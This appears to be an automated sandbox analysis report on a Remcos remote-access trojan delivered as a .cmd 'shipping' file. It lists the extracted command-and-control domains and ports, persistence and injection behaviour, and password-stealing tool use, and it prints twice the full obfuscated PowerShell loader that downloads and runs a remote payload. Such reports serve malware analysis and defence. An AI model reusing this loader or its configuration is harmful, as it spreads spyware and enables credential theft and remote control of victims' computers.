remcos | b616d190e295b74aaf39f7d742d3957411a0985f9372603307a4c0a6e865ecd0

Analysis

max time kernel
148s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
26-11-2024 20:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

z51awb_shipping.cmd
Size

6KB
MD5

47ed689a5e67f8eadfbdf8eee3fecb84
SHA1

57101b7187597c2db41509b98895eafa4c7116eb
SHA256

b616d190e295b74aaf39f7d742d3957411a0985f9372603307a4c0a6e865ecd0
SHA512

5d92c1444345c9114932f90d80d2e83bf1612ac6f79b66ce6d51b8c7b2a7f400e68302c6fb194200e1675e97345eb163606478ae338a44bd36fa921136e6110c
SSDEEP

192:thIpQ550zJ2QmToiuhQ7HgCXK1qqJ36w3Av/l9s7nm/+pyBMfkhX:tmpQ5a8f8wa1i/lS7nnpN4

Score

10^/10

remcos a$ian collection discovery execution persistence rat

Malware Config

Extracted

Family

remcos

Botnet

A$ian

iwarsut775laudryed1.duckdns.org:57484

iwarsut775laudryed1.duckdns.org:57483

iwarsut775laudryed2.duckdns.org:57484

iwarsut775laudryed3.duckdns.org:57484

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
true
install_flag
false
keylog_crypt
false
keylog_file
hmbnspt.dat
keylog_flag
false
keylog_path
%AppData%
mouse_option
false
mutex
shibuetgtst-WMSLPY
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/1408-75-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/2788-83-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/4432-77-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/4432-77-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/1408-75-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 1 IoCs

flow	pid	Process
7	4172	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4172	powershell.exe
772	powershell.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	dxdiag.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Eichmanns = "%Medborger% -windowstyle 1 $Bolometers=(gp -Path 'HKCU:\\Software\\Clydes199\\').Corsy;%Medborger% ($Bolometers)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
3660	dxdiag.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
772	powershell.exe
3660	dxdiag.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 3660 set thread context of 1408	3660	dxdiag.exe	123
PID 3660 set thread context of 4432	3660	dxdiag.exe	124
PID 3660 set thread context of 2788	3660	dxdiag.exe	125

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dxdiag.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dxdiag.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dxdiag.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dxdiag.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2716	cmd.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
4692	reg.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
4172	powershell.exe
4172	powershell.exe
772	powershell.exe
772	powershell.exe
772	powershell.exe
1408	dxdiag.exe
1408	dxdiag.exe
2788	dxdiag.exe
2788	dxdiag.exe
1408	dxdiag.exe
1408	dxdiag.exe

Suspicious behavior: MapViewOfSection 15 IoCs

pid	Process
772	powershell.exe
772	powershell.exe
772	powershell.exe
772	powershell.exe
772	powershell.exe
772	powershell.exe
772	powershell.exe
772	powershell.exe
772	powershell.exe
772	powershell.exe
772	powershell.exe
772	powershell.exe
3660	dxdiag.exe
3660	dxdiag.exe
3660	dxdiag.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4172	powershell.exe
Token: SeDebugPrivilege	772	powershell.exe
Token: SeDebugPrivilege	2788	dxdiag.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3660	dxdiag.exe

Suspicious use of WriteProcessMemory 57 IoCs

description	pid	Process	procid_target
PID 2716 wrote to memory of 4172	2716	cmd.exe	86
PID 2716 wrote to memory of 4172	2716	cmd.exe	86
PID 772 wrote to memory of 3328	772	powershell.exe	107
PID 772 wrote to memory of 3328	772	powershell.exe	107
PID 772 wrote to memory of 3328	772	powershell.exe	107
PID 772 wrote to memory of 2928	772	powershell.exe	108
PID 772 wrote to memory of 2928	772	powershell.exe	108
PID 772 wrote to memory of 2928	772	powershell.exe	108
PID 772 wrote to memory of 4492	772	powershell.exe	109
PID 772 wrote to memory of 4492	772	powershell.exe	109
PID 772 wrote to memory of 4492	772	powershell.exe	109
PID 772 wrote to memory of 3040	772	powershell.exe	110
PID 772 wrote to memory of 3040	772	powershell.exe	110
PID 772 wrote to memory of 3040	772	powershell.exe	110
PID 772 wrote to memory of 1676	772	powershell.exe	111
PID 772 wrote to memory of 1676	772	powershell.exe	111
PID 772 wrote to memory of 1676	772	powershell.exe	111
PID 772 wrote to memory of 3076	772	powershell.exe	112
PID 772 wrote to memory of 3076	772	powershell.exe	112
PID 772 wrote to memory of 3076	772	powershell.exe	112
PID 772 wrote to memory of 232	772	powershell.exe	113
PID 772 wrote to memory of 232	772	powershell.exe	113
PID 772 wrote to memory of 232	772	powershell.exe	113
PID 772 wrote to memory of 4448	772	powershell.exe	114
PID 772 wrote to memory of 4448	772	powershell.exe	114
PID 772 wrote to memory of 4448	772	powershell.exe	114
PID 772 wrote to memory of 784	772	powershell.exe	115
PID 772 wrote to memory of 784	772	powershell.exe	115
PID 772 wrote to memory of 784	772	powershell.exe	115
PID 772 wrote to memory of 4252	772	powershell.exe	116
PID 772 wrote to memory of 4252	772	powershell.exe	116
PID 772 wrote to memory of 4252	772	powershell.exe	116
PID 772 wrote to memory of 4700	772	powershell.exe	117
PID 772 wrote to memory of 4700	772	powershell.exe	117
PID 772 wrote to memory of 4700	772	powershell.exe	117
PID 772 wrote to memory of 3660	772	powershell.exe	118
PID 772 wrote to memory of 3660	772	powershell.exe	118
PID 772 wrote to memory of 3660	772	powershell.exe	118
PID 772 wrote to memory of 3660	772	powershell.exe	118
PID 3660 wrote to memory of 4892	3660	dxdiag.exe	119
PID 3660 wrote to memory of 4892	3660	dxdiag.exe	119
PID 3660 wrote to memory of 4892	3660	dxdiag.exe	119
PID 4892 wrote to memory of 4692	4892	cmd.exe	122
PID 4892 wrote to memory of 4692	4892	cmd.exe	122
PID 4892 wrote to memory of 4692	4892	cmd.exe	122
PID 3660 wrote to memory of 1408	3660	dxdiag.exe	123
PID 3660 wrote to memory of 1408	3660	dxdiag.exe	123
PID 3660 wrote to memory of 1408	3660	dxdiag.exe	123
PID 3660 wrote to memory of 1408	3660	dxdiag.exe	123
PID 3660 wrote to memory of 4432	3660	dxdiag.exe	124
PID 3660 wrote to memory of 4432	3660	dxdiag.exe	124
PID 3660 wrote to memory of 4432	3660	dxdiag.exe	124
PID 3660 wrote to memory of 4432	3660	dxdiag.exe	124
PID 3660 wrote to memory of 2788	3660	dxdiag.exe	125
PID 3660 wrote to memory of 2788	3660	dxdiag.exe	125
PID 3660 wrote to memory of 2788	3660	dxdiag.exe	125
PID 3660 wrote to memory of 2788	3660	dxdiag.exe	125

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\z51awb_shipping.cmd"
1⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2716
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -windowstyle hidden ";$Paleomagnetist='Tegneenhed';;$Bloodstroke='Zwieback';;$Kalligraferne136='Talesituationerne';;$Lystredes='ulrikes';;$Ozon='Tantum';;$Genopbygning=$host.Name;function Kilters($Yderpunkts){If ($Genopbygning) {$Bunchily=5} for ($Exemplar=$Bunchily;;$Exemplar+=6){if(!$Yderpunkts[$Exemplar]) { break }$Snorres+=$Yderpunkts[$Exemplar]}$Snorres}function Tttekammene($Appetitligst){ .($Levnedsmiddelstyrelsen) ($Appetitligst)}$Omskolingen=Kilters 'Eje.dNUnatiEInap.T Dand.SexkuWRepreE ChribSysteCUmbrilRammiiCrom eEnebrnove.gt';$Allergologernes=Kilters 'D.iftM GastoInfixz SkydiSlumrl Afsal Sknda Adis/';$Bygningsinspektrers=Kilters 'AlkylT P rllHy,ots Papa1Whiff2';$Subshrub='Fjo s[ SpisNWi keETorantSolsk.FeberSReferETetraR SenavFadlsiGrillcSygefe,omitp Rek ORelatIBradyNBootfTTend m isteAJdefonHemelAFibbrgAdvenEGudenRBetac]A oid:Axers:Gy sys.apooeNisk cAph,oUOutrar esomIMangeTHalvny pondP Bumbr OmkooO,kast UdbroDisgrCSyncoOPneumlRacem= Bk e$ meg,bMo eryNonsagDilemNFdevaITalennGifteg AlriSUngdoItoughnOr ntSAdvispRe erE IdrtkTempeTBi leRHyposEFe,gnR Ur sS';$Allergologernes+=Kilters 'Trd.m5 Whit. Neck0Favor Sc op( laaW CraziEkstrn lacadbobleofiskewPaadrsRrbla ElodeNFlyp TP ste Skvet1 ,nop0 delu. Krbl0Mesat;Coint aptWKommeiTot lnMantr6 Brai4Vidn ; andb EmborxTw ni6 onf4Myth ;Gerfu hamamrklbaavUdspa: Chap1Be ik3Fi.er1 C rr. W ld0Blegn)becaf NatioG Droge PeticKalvek illgo ,eli/Ombre2 .dsv0Unlim1Guill0Scene0B.bli1 Can 0Fodba1Un.oo FeltFSubpeiDoorwrBeha,eMast.f ,angoeyolfxSuper/Nulls1Mar h3 Forp1Udbyt.plack0';$Sprgere=Kilters ' arklUTranqs BabaeProblrUdrmn- Cin.AP eheG JusseOpsp NUnorit';$misemploy=Kilters 'Athy hHastet pre tUnpropBon.esPothu: Ggen/madni/Ingeri.onsen H.titHel reHensyrIrregc AmazoRestanVatt sObr,pu.eleflRea.rtFa dg.tilsacInddao oeti. Parlt lammzNeate/FrakosSkuestRotteeAfledpUdholcUnmumhKabeliKult lBil,mdHoloprt iveeunflanHarce. aadxAneposSplinn';$Noncohabitation=Kilters 'Tidsp>';$Levnedsmiddelstyrelsen=Kilters ' EddiiBrnehe Aposx';$Notidanian='Humective';$Herrerkkens='\Borgerliggrelsen.Bol';Tttekammene (Kilters ' ncon$TitiaGElit lHooveo In.rBAlarmaChresltakti:OpvarpK rkeUSevensBri,alHandeE UdryS KorrpGenneISka eLBo stL Kr feReprsT.ndis=Gemmo$Phon.esammen,enaevAnven: C lpAA.minPSupp pR empD ForkAClemet odleA Skra+Unde $Crucih,vnine BailR emirCiphee nhreRDokumkFors,KPraetES nsinSmaatS');Tttekammene (Kilters 'Fo re$Af rfGDisenLBohawoUrstrbOvereaJubillIng f:NonclM asteth oaN FordoCorroR AktirAntimhM nofONonioEGorvaAFolde=Vidtg$D skemConoii MiseSIndviEVolplM PrecPZo splDybvaOUnapoYVe,ne. r mmS oughpBilleLLem.uI quifTBrnds( hjer$TosomNMusikOUnderNIndk cUdp,lOFromah ImbrAIntraB BrugIEksamtCurblASprydTDdssyIVisitOMiocrnSplku)');Tttekammene (Kilters $Subshrub);$misemploy=$Menorrhoea[0];$Kvindehaderen=(Kilters 'Hambo$CostugLongeL,ffecOBytt.bI teraDatabl Meso:,utingFle sld mmeOMe icsRemensKugelAPyrit=BesmyNTeutoep anoWRo gh-,aatvoOrd uB InfrJ Rec,eCrosscCorncTWeigh Flaccskrabby ,uscsC opeTSig aEPaus MBelit.Denud$EquilObrattmOp,ivsArchikBestroOpsigL intrIBunchNmoonsGDemifESpil N');Tttekammene ($Kvindehaderen);Tttekammene (Kilters ' beke$ExplaGReckulPalaeoSnap s ljesE icoa L se.fasteHCbbiseLeveraHeterd E steSpolirArrh sdobbe[Ro.nt$Ib liS FuldpCalorrRibalgBee he amsvrUnloaeKa,rw]Enk,l=w rka$UnordAfaurdl LaenlZy adePersor VendgE ektoOver lEmundoKur cgSkrmdeRi,gtrAnnabnRokkee Hauns');$Enqueters=Kilters 'Fo pr$ umbeGDropslstampoFjerpsMelansSinksaGener.OprrsDBlazioumiskw U.lsnChi,pl BionoLangsaIngradFlavoFPhotoiKupeelVillee Frag( dise$ irksmSemisi.upersRegiseSlyngm nworp CelllApoleo Re,vyGeest,kr se$ Exp.HDeerfo Hyldu SlbessignieGardew.epperNatioiPrebogTribohMundstO ien)';$Housewright=$Puslespillet;Tttekammene (Kilters ' Simo$H oflg,oegeLSulfuOCitexB R,seAudsejL Solo:L nsmKStamfNLingeOShattppepsisHe eri PapiVBrown2Covet3 Fred1 ran=Inter(An ivtBloteeComm s doptTDoris- veryp loria OmryTMenneHPlotc Elekt$SamlsHU danoGingeuIn pes Br seSterlWhngebrSik,eISalvegShitthAtomiTpoace)');while (!$Knopsiv231) {Tttekammene (Kilters 'Smaar$bekvegs rivlNonlio ToppbSor eaCountl ,utt: .errLDoms o StuddAnt ndEtu siRe ieg Kak eR,ngosElektifarmaaMina,=Grfab$Ta ofKQuixoeun ermAnvispAtle t') ;Tttekammene $Enqueters;Tttekammene (Kilters 'Simuls.clertJubilaCequiR MotoTPunkt-ReeveSTra sLDoupfEG nmaeUdparPKat l latt4');Tttekammene (Kilters 'Lyngs$.rbejgSaalsL foruO,rikaBk,nooARdvinlPukeu:Brid,k ,endN UndeO BiblP lattSAntemI SaccVFlles2Elast3Trioe1E,dan=hugge( VandTBlnd ETilhysspektt lma- Battp,rbejaStridTWhizzHNo bl Bebu$ScienhTidseOFatalUBlameSHaw.beUncriWchylorKre tIFllesGTimetHr ablTBes.a)') ;Tttekammene (Kilters 'Ham e$srbehG Unp LHorsoOGuitaBAuto ATetral Mono:Indlss aegtPArmslI InfeRExe gTSubcuSUdgra=T,ekk$DiskvGIn eslPhoenOma kebAdganA s,uaL Offs: osta satuD ntinO SubcPUnattTAfsluI KrignBagsmGAnnel+P tri+ Bukk%Bahlm$DownsMAutonERave N dartO SterR Herbr CarbhK adrO .enteisomoAMunch.i cesc EpizOBardeuBilslNhovedT') ;$misemploy=$Menorrhoea[$Spirts]}$Radiologi=282520;$Elevatorfrerens=31488;Tttekammene (Kilters ' Frst$unbe,GAnoraldia mo DrmmBElatrA H peLNo,as:PerisR GuldBAssocaTorp,R IndaESuverSKapreT KrageBasa,sSkyde5 H li4Uddan Nstst=Azury LocutGarrowE HrfaTulvin-,kaldc ivreOBellyN AnlgtVin.yeFa cinSupe,t Unhy Mhoss$Sacr hImpigo AntiUScottSBe.rteSignawWirdkR Lu,hIMartrGPostrHEnkest');Tttekammene (Kilters 'Parim$ CaptgSimullHypocopenpobBa lfa Mat,l Frug: BivoPRe fraChic.rRecontStonee Briod Strenun areBilggs Mis,sMi,ce Sexfi=resol Helsi[ SpinSUnderyErindsBra dtMallaeLystem owbo.I.divCMacrooFugemnVowelvS orte InderTentmtVit e]unap :Over :UnentFMundsrArsmeoJardpmForsmBDi graIn,ics DiskeOrtho6 Lo k4NonseSco swt Gyttr WhiliPanorn Untrgsmaa,( Delt$TakkeRKindlb Si,eaOverwr stefeHeartsCardit TuikeMultisEmiss5Socia4Dress)');Tttekammene (Kilters 'Mo.or$HeypegPersoLFensmOFloatbWasteAMonoclBista:SkejshDiderJScup,ERos.wSAn elTSmrehEfestkr pinsefemogTLandb B.nhi=Ame t Skill[Hyb.aSPostpY,rthoSSlagttEpi leRivnimForbo.TersetCh toeO tswXBlacktSmrre.EfterEkakofNHimmecElek oannitDBeforiPrestnGeni,gNibby]Int r:Diahe:Berida SelvsFremaCS.ikkI EleciFoxt .Kejs G H reERekomtForlysarrepTTownyrunderi,lutbnstorfG,maad(Dueli$Kast,PburleACoinmRBismuTPaatrENeotrDSta.enFilm e O ubSMatemSHjrej)');Tttekammene (Kilters 'lrker$Bras,gdenatlIskreOVenirBope eAOmredLMimik:Sv jsb FrerUSpjt TKlimaCMon,chDecimE ,utsRDoggiEPolosr V ge=E wil$maundHBestejMyt iEskaveSNavngT OutrEhe dbrS gmee SavfTBlas .,orsesSikkeULbedaBS nkosFa.veTYillcrPip.riCirkuNRillegfurro( Sort$AutodR,eactAin,eld,ehftIHawvaOreparlFladeoClen,g AxenI lagi,Vejrs$,buttEBesviL ampEPr.jevCli.iARevoktCal,iO Gorbr Du.lf onocR ForleValidRRigsfe ChurnPlentsHolid)');Tttekammene $Butcherer;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4172

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Paleomagnetist='Tegneenhed';;$Bloodstroke='Zwieback';;$Kalligraferne136='Talesituationerne';;$Lystredes='ulrikes';;$Ozon='Tantum';;$Genopbygning=$host.Name;function Kilters($Yderpunkts){If ($Genopbygning) {$Bunchily=5} for ($Exemplar=$Bunchily;;$Exemplar+=6){if(!$Yderpunkts[$Exemplar]) { break }$Snorres+=$Yderpunkts[$Exemplar]}$Snorres}function Tttekammene($Appetitligst){ .($Levnedsmiddelstyrelsen) ($Appetitligst)}$Omskolingen=Kilters 'Eje.dNUnatiEInap.T Dand.SexkuWRepreE ChribSysteCUmbrilRammiiCrom eEnebrnove.gt';$Allergologernes=Kilters 'D.iftM GastoInfixz SkydiSlumrl Afsal Sknda Adis/';$Bygningsinspektrers=Kilters 'AlkylT P rllHy,ots Papa1Whiff2';$Subshrub='Fjo s[ SpisNWi keETorantSolsk.FeberSReferETetraR SenavFadlsiGrillcSygefe,omitp Rek ORelatIBradyNBootfTTend m isteAJdefonHemelAFibbrgAdvenEGudenRBetac]A oid:Axers:Gy sys.apooeNisk cAph,oUOutrar esomIMangeTHalvny pondP Bumbr OmkooO,kast UdbroDisgrCSyncoOPneumlRacem= Bk e$ meg,bMo eryNonsagDilemNFdevaITalennGifteg AlriSUngdoItoughnOr ntSAdvispRe erE IdrtkTempeTBi leRHyposEFe,gnR Ur sS';$Allergologernes+=Kilters 'Trd.m5 Whit. Neck0Favor Sc op( laaW CraziEkstrn lacadbobleofiskewPaadrsRrbla ElodeNFlyp TP ste Skvet1 ,nop0 delu. Krbl0Mesat;Coint aptWKommeiTot lnMantr6 Brai4Vidn ; andb EmborxTw ni6 onf4Myth ;Gerfu hamamrklbaavUdspa: Chap1Be ik3Fi.er1 C rr. W ld0Blegn)becaf NatioG Droge PeticKalvek illgo ,eli/Ombre2 .dsv0Unlim1Guill0Scene0B.bli1 Can 0Fodba1Un.oo FeltFSubpeiDoorwrBeha,eMast.f ,angoeyolfxSuper/Nulls1Mar h3 Forp1Udbyt.plack0';$Sprgere=Kilters ' arklUTranqs BabaeProblrUdrmn- Cin.AP eheG JusseOpsp NUnorit';$misemploy=Kilters 'Athy hHastet pre tUnpropBon.esPothu: Ggen/madni/Ingeri.onsen H.titHel reHensyrIrregc AmazoRestanVatt sObr,pu.eleflRea.rtFa dg.tilsacInddao oeti. Parlt lammzNeate/FrakosSkuestRotteeAfledpUdholcUnmumhKabeliKult lBil,mdHoloprt iveeunflanHarce. aadxAneposSplinn';$Noncohabitation=Kilters 'Tidsp>';$Levnedsmiddelstyrelsen=Kilters ' EddiiBrnehe Aposx';$Notidanian='Humective';$Herrerkkens='\Borgerliggrelsen.Bol';Tttekammene (Kilters ' ncon$TitiaGElit lHooveo In.rBAlarmaChresltakti:OpvarpK rkeUSevensBri,alHandeE UdryS KorrpGenneISka eLBo stL Kr feReprsT.ndis=Gemmo$Phon.esammen,enaevAnven: C lpAA.minPSupp pR empD ForkAClemet odleA Skra+Unde $Crucih,vnine BailR emirCiphee nhreRDokumkFors,KPraetES nsinSmaatS');Tttekammene (Kilters 'Fo re$Af rfGDisenLBohawoUrstrbOvereaJubillIng f:NonclM asteth oaN FordoCorroR AktirAntimhM nofONonioEGorvaAFolde=Vidtg$D skemConoii MiseSIndviEVolplM PrecPZo splDybvaOUnapoYVe,ne. r mmS oughpBilleLLem.uI quifTBrnds( hjer$TosomNMusikOUnderNIndk cUdp,lOFromah ImbrAIntraB BrugIEksamtCurblASprydTDdssyIVisitOMiocrnSplku)');Tttekammene (Kilters $Subshrub);$misemploy=$Menorrhoea[0];$Kvindehaderen=(Kilters 'Hambo$CostugLongeL,ffecOBytt.bI teraDatabl Meso:,utingFle sld mmeOMe icsRemensKugelAPyrit=BesmyNTeutoep anoWRo gh-,aatvoOrd uB InfrJ Rec,eCrosscCorncTWeigh Flaccskrabby ,uscsC opeTSig aEPaus MBelit.Denud$EquilObrattmOp,ivsArchikBestroOpsigL intrIBunchNmoonsGDemifESpil N');Tttekammene ($Kvindehaderen);Tttekammene (Kilters ' beke$ExplaGReckulPalaeoSnap s ljesE icoa L se.fasteHCbbiseLeveraHeterd E steSpolirArrh sdobbe[Ro.nt$Ib liS FuldpCalorrRibalgBee he amsvrUnloaeKa,rw]Enk,l=w rka$UnordAfaurdl LaenlZy adePersor VendgE ektoOver lEmundoKur cgSkrmdeRi,gtrAnnabnRokkee Hauns');$Enqueters=Kilters 'Fo pr$ umbeGDropslstampoFjerpsMelansSinksaGener.OprrsDBlazioumiskw U.lsnChi,pl BionoLangsaIngradFlavoFPhotoiKupeelVillee Frag( dise$ irksmSemisi.upersRegiseSlyngm nworp CelllApoleo Re,vyGeest,kr se$ Exp.HDeerfo Hyldu SlbessignieGardew.epperNatioiPrebogTribohMundstO ien)';$Housewright=$Puslespillet;Tttekammene (Kilters ' Simo$H oflg,oegeLSulfuOCitexB R,seAudsejL Solo:L nsmKStamfNLingeOShattppepsisHe eri PapiVBrown2Covet3 Fred1 ran=Inter(An ivtBloteeComm s doptTDoris- veryp loria OmryTMenneHPlotc Elekt$SamlsHU danoGingeuIn pes Br seSterlWhngebrSik,eISalvegShitthAtomiTpoace)');while (!$Knopsiv231) {Tttekammene (Kilters 'Smaar$bekvegs rivlNonlio ToppbSor eaCountl ,utt: .errLDoms o StuddAnt ndEtu siRe ieg Kak eR,ngosElektifarmaaMina,=Grfab$Ta ofKQuixoeun ermAnvispAtle t') ;Tttekammene $Enqueters;Tttekammene (Kilters 'Simuls.clertJubilaCequiR MotoTPunkt-ReeveSTra sLDoupfEG nmaeUdparPKat l latt4');Tttekammene (Kilters 'Lyngs$.rbejgSaalsL foruO,rikaBk,nooARdvinlPukeu:Brid,k ,endN UndeO BiblP lattSAntemI SaccVFlles2Elast3Trioe1E,dan=hugge( VandTBlnd ETilhysspektt lma- Battp,rbejaStridTWhizzHNo bl Bebu$ScienhTidseOFatalUBlameSHaw.beUncriWchylorKre tIFllesGTimetHr ablTBes.a)') ;Tttekammene (Kilters 'Ham e$srbehG Unp LHorsoOGuitaBAuto ATetral Mono:Indlss aegtPArmslI InfeRExe gTSubcuSUdgra=T,ekk$DiskvGIn eslPhoenOma kebAdganA s,uaL Offs: osta satuD ntinO SubcPUnattTAfsluI KrignBagsmGAnnel+P tri+ Bukk%Bahlm$DownsMAutonERave N dartO SterR Herbr CarbhK adrO .enteisomoAMunch.i cesc EpizOBardeuBilslNhovedT') ;$misemploy=$Menorrhoea[$Spirts]}$Radiologi=282520;$Elevatorfrerens=31488;Tttekammene (Kilters ' Frst$unbe,GAnoraldia mo DrmmBElatrA H peLNo,as:PerisR GuldBAssocaTorp,R IndaESuverSKapreT KrageBasa,sSkyde5 H li4Uddan Nstst=Azury LocutGarrowE HrfaTulvin-,kaldc ivreOBellyN AnlgtVin.yeFa cinSupe,t Unhy Mhoss$Sacr hImpigo AntiUScottSBe.rteSignawWirdkR Lu,hIMartrGPostrHEnkest');Tttekammene (Kilters 'Parim$ CaptgSimullHypocopenpobBa lfa Mat,l Frug: BivoPRe fraChic.rRecontStonee Briod Strenun areBilggs Mis,sMi,ce Sexfi=resol Helsi[ SpinSUnderyErindsBra dtMallaeLystem owbo.I.divCMacrooFugemnVowelvS orte InderTentmtVit e]unap :Over :UnentFMundsrArsmeoJardpmForsmBDi graIn,ics DiskeOrtho6 Lo k4NonseSco swt Gyttr WhiliPanorn Untrgsmaa,( Delt$TakkeRKindlb Si,eaOverwr stefeHeartsCardit TuikeMultisEmiss5Socia4Dress)');Tttekammene (Kilters 'Mo.or$HeypegPersoLFensmOFloatbWasteAMonoclBista:SkejshDiderJScup,ERos.wSAn elTSmrehEfestkr pinsefemogTLandb B.nhi=Ame t Skill[Hyb.aSPostpY,rthoSSlagttEpi leRivnimForbo.TersetCh toeO tswXBlacktSmrre.EfterEkakofNHimmecElek oannitDBeforiPrestnGeni,gNibby]Int r:Diahe:Berida SelvsFremaCS.ikkI EleciFoxt .Kejs G H reERekomtForlysarrepTTownyrunderi,lutbnstorfG,maad(Dueli$Kast,PburleACoinmRBismuTPaatrENeotrDSta.enFilm e O ubSMatemSHjrej)');Tttekammene (Kilters 'lrker$Bras,gdenatlIskreOVenirBope eAOmredLMimik:Sv jsb FrerUSpjt TKlimaCMon,chDecimE ,utsRDoggiEPolosr V ge=E wil$maundHBestejMyt iEskaveSNavngT OutrEhe dbrS gmee SavfTBlas .,orsesSikkeULbedaBS nkosFa.veTYillcrPip.riCirkuNRillegfurro( Sort$AutodR,eactAin,eld,ehftIHawvaOreparlFladeoClen,g AxenI lagi,Vejrs$,buttEBesviL ampEPr.jevCli.iARevoktCal,iO Gorbr Du.lf onocR ForleValidRRigsfe ChurnPlentsHolid)');Tttekammene $Butcherer;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:772
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  PID:3328
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  PID:2928
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  PID:4492
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  PID:3040
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  PID:1676
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  PID:3076
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  PID:232
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  PID:4448
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  PID:784
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  PID:4252
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  PID:4700
- C:\Windows\SysWOW64\dxdiag.exe
  "C:\Windows\SysWOW64\dxdiag.exe"
  2⤵
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3660
- - C:\Windows\SysWOW64\cmd.exe
